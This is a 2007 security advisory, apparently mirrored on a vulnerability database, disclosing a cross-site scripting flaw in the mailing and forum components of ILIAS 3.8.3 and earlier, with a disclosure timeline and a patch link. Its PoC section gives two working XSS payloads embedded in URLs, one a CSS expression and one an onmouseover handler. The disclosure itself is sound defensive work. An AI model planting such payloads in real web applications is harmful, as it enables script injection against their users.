Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18324
HistoryOct 31, 2007 - 12:00 a.m.

ILIAS <= 3.8.3 Cross Site Scripting

2007-10-3100:00:00
vulners.com
24
JSON

======================================================================
ILIAS <= 3.8.3 Cross Site Scripting

Author: L4teral <l4teral [4t] gmail com>
Impact: Cross Site Scripting
Status: patch available

Affected software description:

Application: ILIAS
Version: <= 3.8.3
Vendor: http://www.ilias.de

Description:
ILIAS is a powerful web-based learning management system that allows
you to easily manage learning resources in an integrated system.

Vulnerability:

The mailing and forum components are vulnerable to cross site scripting.

PoC/Exploit:

create forum post/mail with:
http://www.ex"style="width:expression(alert('xss'))"ample.com

http://www.ex"onmouseover="javascript:alert('xss');"ample.com

Solution:

install security patch:
http://www.ilias.de/docu/goto.php?target=pg_16836_35&amp;client_id=docu

Timeline:

17.10.2007 - vendor informed
25.10.2007 - vendor responded
29.10.2007 - vendor released patch
30.10.2007 - public disclosure

JSON